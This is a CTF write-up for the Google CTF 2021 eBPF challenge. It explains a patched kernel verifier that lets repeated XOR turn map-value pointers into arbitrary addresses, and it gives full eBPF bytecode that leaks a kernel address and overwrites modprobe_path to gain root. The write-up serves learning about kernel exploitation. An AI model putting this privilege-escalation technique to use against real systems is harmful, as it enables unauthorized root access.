Google CTF 2021 eBPF
Last weekend we played Google CTF and I have solved 2 challenges: first 2 parts of fullchain
and eBPF
. The fullchain
challenge is actually very easy: v8
bug and mojo
bug are just basic OOB access bugs. However, eBPF
is quite interesting for me, since it is my first time to learn and exploit eBPF
module in Linux kernel, so it is worthy to do a write-up for it.
0x00 Overview
In this challenge, instead of a .ko
kernel module like normal kernel exploit challenge, we are provided only with a patched Linux kernel. In the patch, verifier.c
of eBPF
is modified so that xor
operation to pointer to map value can be allowed. The problem is when applying xor
to a pointer 2 times using different value, we can actually manipulate the pointer to arbitrary address, so that we can have arbitrary read and write primitive. Then we can use this to leak kernel address by spraying and reading tty_struct
, and to rewrite modprobe_path
to get root privilege.
0x01 Introduction to eBPF
There are many useful resources about eBPF online, the ones that are most useful for me to solve this challenge are this introduction to low-level stuff of eBPF and this exploit of an eBPF CVE. To be short, eBPF is a virtual machine that runs in Linux kernel. We can provide bytecode to kernel in user program, and kernel will check if the bytecode is secure and valid to be run in kernel before loading them; if the check is passed, the kernel will load the bytecode and run it in certain event. Note that the check is done before the bytecode is run instead of when the bytecode is running. Therefore, if the check is somewhat wrong, which allows insecure bytecode to be loaded and run, the kernel can be compromised. This is exactly what this challenge is about.
eBPF Environment
Configuring development environment for eBPF in C takes me quite long time, because the sock_example provided cannot be compiled successfully on my computer. Finally, the CVE exploit mentioned above solved this problem for me, so that I can implement eBPF API using syscall
directly. Thus finally, the only required header file is bpf_insn.h, which can be downloaded from Linux repository easily.
There is also another problem: we cannot compile the exploit using musl-gcc
, which produces small binary. The problem is that it seems that musl-gcc
cannot find the <linux/xxx.h>
header files. I solved this by preprocessing exploit using gcc -E
and compiling the preprocessing output using musl-gcc
:
gcc -E exp.c -o fs/exp.c
musl-gcc -static fs/exp.c -o fs/exp
This is a quite useful trick when musl-gcc
cannot compile the exploit that can be compiled using gcc
.
0x02 Vulnerability
The first patch adds a bool auth_map
field to struct bpf_reg_state
, which is the structure used to represent the state of register when performing bytecode verification. The second patch allows BPF_XOR
operation for PTR_TO_MAP_VALUE
type register in function adjust_ptr_min_max_vals
:
case BPF_XOR:
// As long as we downgrade the result to scalar it is safe.
if (dst_reg->type == PTR_TO_MAP_VALUE) {
dst_reg->type = SCALAR_VALUE;
dst_reg->auth_map = true;
break;
}
When BPF_XOR
is applied to scalar register that is converted from PTR_TO_MAP_VALUE
by BPF_XOR
operation, it is set back to PTR_TO_MAP_VALUE
type.
// in function adjust_scalar_min_max_vals
case BPF_XOR:
/* Restore the pointer type.*/
if (dst_reg->auth_map) {
dst_reg->auth_map = false;
dst_reg->type = PTR_TO_MAP_VALUE;
break;
}
The problem is obvious: if we apply BPF_XOR
to PTR_TO_MAP_VALUE
register, it will be converted to SCALAR_VALUE
type and auth_map
is set to true; then we apply BPF_XOR
to that register again, since auth_map == true
, the type is set back to PTR_TO_MAP_VALUE
; however, the operand value provided to 2 BPF_XOR
operations can be different, so we can actually set the register to be an arbitrary address but still being PTR_TO_MAP_VALUE
type. This can lead to arbitrary memory read and write primitive eventually.
0x03 Exploitation
Get PTR_TO_MAP_VALUE Register
This actually takes me quite long time. I originally thought the value returned from BPF_LD_MAP_FD
is PTR_TO_MAP_VALUE
but it is actually not. Finally by reading source code and finding reference to RET_PTR_TO_MAP_VALUE_OR_NULL
, we find that return type of BPF_FUNC_map_lookup_elem
is RET_PTR_TO_MAP_VALUE_OR_NULL
, and by checking NULL
for it, we can get PTR_TO_MAP_VALUE
type. This is also exactly shown in the example provided.
Therefore, we can apply BPF_XOR
operation to that register, and it turns out that verification check is passed, which means the vulnerability has already been triggered. We can leak the address of BPF_MAP_TYPE_ARRAY
by writing the result of BPF_XOR
to the buffer and read the buffer in user space.
Leaking Kernel Address
After some investigation, I found that the BPF_MAP_TYPE_ARRAY
buffer is probably stored on heap. Therefore, the idea is to spray tty_struct
, which contains a kernel address at +0x18
offset, and read that field to get kernel address. However, after some trial, I found that it is hard to allocate tty_struct
adjacent to the BPF_MAP_TYPE_ARRAY
buffer; nonetheless, I also found that although tty_struct
is quite far from BPF_MAP_TYPE_ARRAY
buffer, the offset from the buffer to tty_struct
is quite constant: 0x21ef0
. Therefore, we can just add this constant offset to buffer address and read the +0x18
field to leak kernel address. However, this is not 100% stable and need some brute-force to make this assumption true.
The bytecode for leaking is shown below:
struct bpf_insn insns[]={
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), /* *(u32 *)(fp - 4) = r0 */
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */
BPF_LD_MAP_FD(BPF_REG_1, EXP_MAP_FD),
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 11+1),
BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),
BPF_MOV64_REG(BPF_REG_3, BPF_REG_0),
BPF_ALU64_IMM(BPF_XOR, BPF_REG_2, 0), // convert r2, r1 to scalar
BPF_ALU64_IMM(BPF_XOR, BPF_REG_1, 0),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0x21ef0+0x18),
BPF_ALU64_REG(BPF_XOR, BPF_REG_0, BPF_REG_2), // r0 = dst ^ src
BPF_ALU64_REG(BPF_XOR, BPF_REG_1, BPF_REG_0), // r1 = src ^ dst ^ src = dst
BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_1, 0), // r2 = [dst] = kernel940
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0x451200), // r2 = &modprobe
BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_2, 0), // store and leak modprobe
BPF_JMP_IMM(BPF_JMP, BPF_REG_0, 0, 1),
BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = 0 */
BPF_EXIT_INSN(),
};
There are also some points to note:
- We need to add some constant to register containing buffer address, but cannot use that register to load memory data directly later; this is because it seems that verifier can detect the out-of-bound access if we do this; so we need to use
xor
magic to indirectly make aPTR_TO_MAP_VALUE
register pointing totty_struct
. - One weird thing is, even if we don’t use
BPF_XOR
, we can still somewhat leak the address of buffer; I am not sure why this happens. - You may ask why I only leak the kernel address in this step, instead of performing the whole exploitation that rewrites
modprobe_path
using arbitrary write; the problem is if operand register ofBPF_XOR
originates from load operation ofPTR_TO_MAP_VALUE
register, secondBPF_XOR
cannot convert the register back toPTR_TO_MAP_VALUE
type. I would guess the reason that patch is added toadjust_scalar_min_max_vals
, which, according to its name, is used to analyze range of a scalar; however, verifier cannot decide range of value loaded fromBPF_MAP_TYPE_ARRAY
memory, so this function will possibly not be called and the patch that converts scalar back toPTR_TO_MAP_VALUE
is not triggered. - It seems that sometimes if we apply
BPF_XOR
to a register for more than 2 times, the kernel will crash when loading the bytecode; I am not sure why this happens either.
Rewriting modprobe_path
Then we are going to exploit the bug again to rewrite modprobe_path
and read the flag. This time, instead of loading address of modprobe_path
from memory, we apply it directly as constant, so the problem in last step does not exist. Then we can use the xor
magic again to have a PTR_TO_MAP_VALUE
register pointing to &modprobe_path
, so that storing to that register rewrites modprobe_path
.
The bytecode is shown below:
struct bpf_insn insns2[]={
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), /* *(u32 *)(fp - 4) = r0 */
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */
BPF_LD_MAP_FD(BPF_REG_1, expmapfd),
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 28+1),
BPF_MOV64_REG(BPF_REG_3, BPF_REG_0),
BPF_ALU64_IMM(BPF_XOR, BPF_REG_3, 0), // convert r0, r3 to scalar
BPF_ALU64_IMM(BPF_XOR, BPF_REG_0, 0),
BPF_MOV64_IMM(BPF_REG_1, 0),
BPF_MOV64_IMM(BPF_REG_2, (modprobe >> 0x30) & 0xffff),
BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 0x30),
BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2),
BPF_MOV64_IMM(BPF_REG_2, (modprobe >> 0x20) & 0xffff),
BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 0x20),
BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2),
BPF_MOV64_IMM(BPF_REG_2, (modprobe >> 0x10) & 0xffff),
BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 0x10),
BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2),
BPF_MOV64_IMM(BPF_REG_2, (modprobe) & 0xffff),
BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = &modprobe
BPF_ALU64_REG(BPF_XOR, BPF_REG_0, BPF_REG_1), // r0 = src ^ &modprobe
BPF_ALU64_IMM(BPF_XOR, BPF_REG_0, 0), // convert r0 back to PTR_TO_MAP_VALUE
BPF_ALU64_REG(BPF_XOR, BPF_REG_3, BPF_REG_0), // r3 = src ^ src ^ &modprobe
BPF_MOV64_IMM(BPF_REG_4, 0),
BPF_MOV64_IMM(BPF_REG_2, (tmp_x >> 0x20) & 0xffff),
BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 0x20),
BPF_ALU64_REG(BPF_OR, BPF_REG_4, BPF_REG_2),
BPF_MOV64_IMM(BPF_REG_2, (tmp_x >> 0x10) & 0xffff),
BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 0x10),
BPF_ALU64_REG(BPF_OR, BPF_REG_4, BPF_REG_2),
BPF_MOV64_IMM(BPF_REG_2, (tmp_x) & 0xffff),
BPF_ALU64_REG(BPF_OR, BPF_REG_4, BPF_REG_2), // r4 = /tmp/x
BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_4, 0), // rewrite modprobe_path
BPF_JMP_IMM(BPF_JMP, BPF_REG_0, 0, 1),
BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = 0 */
BPF_EXIT_INSN(),
};
There are also 2 points to note:
- We have to load the immediate number using
BPF_LSH
andBPF_OR
, becauseBPF_MOV64_IMM
can only support 32-bit signed immediate number. - We cannot apply
BPF_XOR, PTR_TO_MAP_VALUE register, &modprobe_path register
directly because this will raise an error, since value of&modprobe_path
is too low as signed 64-bit integer and is less than a minimum value; instead, we need to convert the register to scalar first before applying this operation, and after this operation the register becomesPTR_TO_MAP_VALUE
again, so we need to apply aBPF_XOR
again to convert it back to scalar. Fortunately, such 3-timesBPF_XOR
does not cause any crash when loading the bytecode.
The full exploit is here.
0x04 Conclusion
This challenge is quite good since I have learned a lot about eBPF when solving this challenge. I hope eBPF can also be a good attack interface when doing real world Linux kernel vulnerability research.